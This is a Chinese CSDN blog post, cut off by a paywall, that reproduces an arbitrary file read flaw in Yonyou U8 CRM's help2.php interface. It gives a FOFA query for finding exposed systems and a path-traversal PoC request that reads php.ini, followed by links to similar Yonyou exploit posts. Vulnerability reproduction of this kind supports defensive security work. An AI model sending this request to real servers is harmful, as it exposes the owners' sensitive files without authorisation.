用友U8+CRM help2 任意文件读取漏洞复现

已于 2024-06-18 14:23:29 修改
阅读量1.3k 收藏 12
点赞数 15
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-12-21 17:09:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135135305
版权
本文介绍了用友U8 CRM的help2接口存在的任意文件读取漏洞,该漏洞可能导致服务器敏感信息泄露。复现环境为FOFA搜索到的系统,修复建议包括限制接口访问权限和升级到安全版本。
摘要由CSDN通过智能技术生成

0x01 产品简介

用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

0x02 漏洞概述

用友 U8 CRM客户关系管理系统 help2接口处存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器敏感信息。

0x03 复现环境

FOFA:title="用友U8CRM"

0x04 漏洞复现

PoC

GET /pub/help2.php?key=/../../apache/php.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 15
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现】用友-U8-CRM-文件读取-help2
知黑而守白
04-19 75
用友U8-CRM是一款由用友软件开发的客户关系管理(CRM)系统。它是基于用友U8企业管理软件平台开发的,旨在帮助企业有效管理和维护与客户之间的关系。该系统提供了一系列功能,包括客户信息管理、销售机会跟踪、市场营销活动管理、客户服务支持等。通过使用用友U8-CRM,企业可以更好地了解客户需求,提高销售效率,增强客户满意度,并实现更好的客户关系管理。用友U8-CRM help2 任意文件读取漏洞,攻击者可以通过构造精心设计的请求,成功利用漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。
swfupload php,SWFUpload php 2.2.0上传漏洞
weixin_35411443的博客
03-12 166
Beats By Dr Dre Studio Pittsburgh Steelers HighDefinition UK:Beats By Dr.Dre Studio Colorful Champagne Limited Edition UK,Beats By Dr.Dre Studio Colorware Chrome Limited Edition UK,Beats By Dr.Dre Stu...
Swfupload.swf 跨站脚本——漏洞复现
W小哥
12-18 4390
一、swfupload.swf简介 SWFUpload 是一款优秀的 Flash 上传控件,它可以非常好的增强 Web 端程序的用户上传体验。SWFUpload 自由灵活的 JavaScript 接口允许开发者自定义包括 HTML/CSS 在内的几乎所有 UI 样式,被广泛运用在大量站点的上传模块中,如 Youtube 和 WordPress 。 此漏洞可能导致严重的 XSS 安全隐患,但是官方一直没有修复。 二、漏洞复现 payload如下 http://XXX/images/swfupload/swfu
修复swfupload2.5版存在的XSS跨站攻击漏洞
10-08
修复swfupload2.5版存在的XSS跨站攻击漏洞,测试无错误版本。
漏洞复现】用友crm某接口存在任意文件上传漏洞
https://blog.echo234.cn/
04-01 439
用友CRM系统是一套专业的客户关系管理软件,旨在帮助企业管理客户关系、提升客户满意度。它涵盖销售管理、市场营销、客户服务等功能模块,可实现客户信息管理、销售机会跟进、市场活动执行、客户服务支持等多方面的需求。该系统具有灵活性强、界面友好、功能完善等特点,支持移动端访问,便于随时随地管理客户关系,提高销售效率和客户满意度。
最新的用友U8+V16.0全产品报价单.xlsx
09-25
最新的用友U8+V16.0全产品报价单,这个是V16.0的版本,最新的用友U8+V16.0全产品报价单,这个是V16.0的版本,
用友U8+V12.0公共插件V7.5安装程序.rar
12-30
用友U8+V12.0公共插件V7.5安装程序详解》 在企业信息化管理中,财务软件扮演着至关重要的角色。用友U8+是一款深受中国企业青睐的财务管理软件,其V12.0版本更是集成了众多功能强大的模块,以满足企业在财务管理、...
用友U8+标准介绍.ppt
03-22
用友U8+标准介绍.ppt
用友U8+13.0数据字典.zip
08-26
用友U8 库表结构
用友U8+v15.0产品手册
07-06
2. **财务管理**:用友U8+v15.0强化了财务核算与管理功能,包括总账、报表、成本、预算等模块。其中,总账模块提供全面的会计核算,报表模块支持自定义报表,成本模块实现精细化成本控制,预算模块则帮助企业制定和...
用友crm客户关系管理ajax/uploadfile.php接口存在任意文件上传漏洞 附POC
nnn2188185的博客
05-23 133
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验,目标是帮助企业有效获取商机、提升营销能力。
WordPress NextGEN Gallery插件‘swfupload.swf’多个跨站脚本漏洞
weixin_30600503的博客
06-14 200
漏洞名称: WordPress NextGEN Gallery插件‘swfupload.swf’多个跨站脚本漏洞 CNNVD编号: CNNVD-201306-196 发布时间: 2013-06-14 更新时间: 2013-06-14 危害等级: 漏洞类型: 跨站脚本 威胁类型: 远程...
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 806
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
swfupload上传文件导致session丢失_通达OA文件上传+文件包含导致RCE漏洞分析复现...
weixin_34792546的博客
01-24 455
把自己在csdn的一些水文移植过来,hhh。文章目录0x00 闲扯0x01 安装0x02 漏洞分析0x03 漏洞复现0x00 闲扯研究了好几个java程序的漏洞,但是都有好多地方不明白,java不太熟悉,太打击人了。先分析之前复现过的php漏洞压压惊。漏洞版本:tongdaOA V11tangdaOA 2017tangdaOA 2016(为啥我下的16版本还要自己添加gateway.ph...
用友U8 CRM swfupload 任意文件上传(含批量验证poc)
weixin_43567873的博客
04-28 99
用友U8 CRM swfupload 任意文件上传(含批量验证poc)
漏洞复现】用友 U8CRM uploadfile.php 任意文件上传漏洞
最新发布
凝聚力安全团队
06-24 642
用友 U8CRM uploadfile.php 接口存在任意文件上传漏洞,攻击者可以通过漏洞上传任意文件甚至木马文件,从而获取服务器权限。用友CRM智能化销售与售后赋能工作台,以赋能团队和客户经营为目标,融入用友在客户关系与营销团队管理的丰富实践经验,专注为企业提供直分销融合一体化、移动化、自动化、社会化、智能化的销售、售后与客户管理解决方案,提升企业的区域客户经营能力与数字化管理决策能力。
用友U8-Cloud接口FileServlet存在任意文件读取漏洞(含批量验证poc)_用友u8-cloud fileservlet接口存在任意文件读取漏洞
m0_60229361的博客
04-16 635
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
用友GRP-U8 operOriztion SQL注入漏洞(含批量验证poc)
weixin_43567873的博客
04-28 102
用友GRP-U8 operOriztion SQL注入漏洞(含批量验证poc)
用友U8_Cloud-base64存在SQL注入漏洞
qq_36334672的博客
04-03 445
​ 用友-U8-Cloud-base64接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值